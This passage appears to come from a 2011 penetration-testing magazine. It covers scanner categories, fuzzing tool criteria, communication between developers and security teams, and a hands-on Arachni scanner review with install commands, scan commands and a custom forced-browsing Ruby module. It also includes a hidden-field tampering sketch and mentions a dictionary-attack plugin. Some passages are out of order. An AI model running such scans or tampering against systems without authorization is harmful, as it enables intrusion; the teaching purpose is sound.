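A real port scanner would parallelise these probes and vary connection behaviour (SYN-only scans, randomized timing) to evade intrusion detection, which is exactly the configuration flexibility described above.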
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most of the commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility adds different tricks to exercise the application's weaknesses and its associated components. For example, the penetration testers can view all cookies, hidden HTML fields, and other data used by the web application and attempt to manipulate their values to trick the application.
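Outside a full proxy, the same tampering can be reproduced by hand. The Ruby sketch below rebuilds an intercepted form submission with an altered hidden field; the URL, field names, and values are hypothetical.

```ruby
require 'net/http'
require 'uri'

# Suppose an intercepted checkout form carried a hidden field
#   <input type="hidden" name="price" value="199.99">
# A tester replays the POST with a manipulated value to see whether the
# server re-validates the price or blindly trusts the client.
uri = URI('http://target.example/checkout') # hypothetical target
request = Net::HTTP::Post.new(uri)
request.set_form_data('item' => 'book', 'price' => '0.01')

# The request is only built here, not sent; sending it would be:
#   Net::HTTP.start(uri.host, uri.port) { |http| http.request(request) }
puts request.body # => "item=book&price=0.01"
```

If the application accepts the tampered price, the tester has demonstrated a classic trust-of-client-data flaw, without any scanner involved.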
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature for the test results.
• Extensibility – The tool should be customizable, and it must provide scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – Having a tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that has the flexibility of use without specific constraints, such as a particular IP range or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data that is sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – To avoid Cross Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying whether it came from a user web form, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow some guidelines for hardening the web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for the web application's users and to protect stored passwords.
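The first two guidelines can be illustrated with a minimal Ruby sketch using only the standard library; the helper names are invented for the example.

```ruby
require 'cgi'
require 'securerandom'

# Guideline 1: never echo browser-supplied data into HTML unescaped,
# so markup arrives as inert text rather than executable script.
def render_comment(user_input)
  "<p>#{CGI.escapeHTML(user_input.to_s)}</p>"
end

# Guideline 2: tie each served form to a random token, and accept the
# submission only if the same token comes back with it.
def issue_csrf_token(session)
  session[:csrf] = SecureRandom.hex(32)
end

def valid_csrf?(session, submitted)
  token = session[:csrf]
  return false unless token && submitted
  # Compare in constant time so the token cannot be guessed byte by byte.
  return false unless token.bytesize == submitted.bytesize
  token.bytes.zip(submitted.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end
```

A form handler would call issue_csrf_token when rendering the form and valid_csrf? before processing the POST; any submission failing the check is treated as a forged request.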
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system; such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of vulnerabilities found in the discovery phase.
Unfortunately, an all clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue over time to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results with the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that over time, manual testing for technical vulnerabilities will move from difficult to impossible as web applications grow in size, scope, and complexity. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on the human factor to manually test these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix to the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer, and what are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
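As a toy illustration of automated test-case creation, the Ruby sketch below derives anomalous inputs from one valid sample by random byte flips, slice duplication, and truncation. This is the "quick and dirty" random style criticised above; a model-based fuzzer would generate cases from a protocol model instead. The seed format is invented for the example.

```ruby
# Derive one anomalous input from a valid seed by a random mutation.
def mutate(seed, rng)
  bytes = seed.bytes
  case rng.rand(3)
  when 0 # flip one byte (XOR with a non-zero value always changes it)
    bytes[rng.rand(bytes.size)] ^= rng.rand(1..255)
  when 1 # duplicate a slice to stress length handling
    i = rng.rand(bytes.size)
    bytes = bytes[0..i] + bytes[i..-1] * 4
  else   # truncate to stress incomplete-message handling
    bytes = bytes[0, rng.rand(bytes.size)]
  end
  bytes.pack('C*')
end

rng  = Random.new(1) # seeded so a failing case can be reproduced
seed = "NAME=alice;AGE=30"
cases = Array.new(10) { mutate(seed, rng) }
# Each case would then be fed to the target; a crash or hang marks a finding.
```

The seeded random generator matters for the remediation requirement discussed earlier: a reproducible case sequence lets developers replay the exact input that triggered a failure.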
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing, and the user must also have control over the fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria.
Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.
Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, Social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.
The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security is slowly pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom, for example a statement like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security Guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating implement a filter policy into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.
There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.
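A minimal sketch of this workflow, using the spec syntax of Minitest, which ships with Ruby (the article's examples use RSpec and Cucumber; the filter under test here is hypothetical):

```ruby
require 'minitest/autorun'

# Hypothetical remediation target: the "filtering policy" expressed as code.
# Strips everything except letters, digits, spaces, underscores, and hyphens.
def sanitize_name(input)
  input.to_s.gsub(/[^A-Za-z0-9 _\-]/, '')
end

# Specs written first, modeling how the code must treat malformed input.
# They fail until the development team implements the filter correctly.
describe 'input filtering policy' do
  it 'strips markup from a name field' do
    _(sanitize_name('<script>alert(1)</script>Bob')).must_equal 'scriptalert1scriptBob'
  end

  it 'leaves legitimate names untouched' do
    _(sanitize_name('Mary-Jane Watson')).must_equal 'Mary-Jane Watson'
  end
end
```

The point is not the filter itself but the contract: the scenario file, not a prose report, tells the developer exactly which inputs the code must survive.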
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class, or line where the problem exists so that they can fix it. If provided enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:
• Create a development framework that has security built into it
• Design an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit the secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well). In the Java community, there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He's a husband, a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can be better compared with commercial online scanners, which are directed at the application and produce a report with no further interaction by the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity – everything is simple and straightforward from a user's or component developer's point of view.
• A stable, efficient, and high-performance framework – Arachni allows custom modules, reports, and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of audit and reconnaissance modules included with Arachni
Audit modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1, and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler will always be run at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
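The redundancy-filter idea can be shown in miniature: a crawler keeps a counter per URL pattern and stops queueing matches once the counter runs out. This sketch is not Arachni's implementation; the class name, patterns, and limits are invented for illustration.

```ruby
# Redundancy filter sketch: each regex is allowed a fixed number of
# matching URLs before further matches are skipped by the crawler.
class RedundancyFilter
  def initialize(rules) # e.g. { /calendar\.php/ => 2 }
    @remaining = rules.dup
  end

  # Returns true if the crawler should still visit this URL.
  def allow?(url)
    rule = @remaining.keys.find { |re| url =~ re }
    return true unless rule            # no rule matches: always crawl
    return false if @remaining[rule] <= 0
    @remaining[rule] -= 1
    true
  end
end

filter = RedundancyFilter.new(/calendar\.php/ => 2)
```

With such a filter, infinite page families (calendars, paginated archives) are sampled a few times instead of being crawled forever.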
The HTML parser can extract forms, links, cookies, and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, providing Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in, and/or restricting the scope of the audit
• Form based AutoLogin – Performs an automated login
• Dictionary attacker – Performs dictionary attacks against HTTP Authentication and forms-based authentication
• Profiler – Performs taint analysis with benign inputs and response time analysis
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules – Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  – AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  – TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  – Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run it natively in Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 http://pentestmag.com 01/2011 (1) November
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation): Listing 2.
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:

$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.

Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues have been detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAFs), perform dictionary attacks, etc.
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, etc.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except those related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated from
# open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) do |file|
            @@__directories << file unless file.include?( '?' )
        end
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each do |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) do |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            end
        end

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists created
                from open source repositories. The wordlist utilized by this
                module will be vast and will add a considerable amount of
                time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually. Check if
                    unauthorized interfaces or confidential information are exposed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can easily be extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
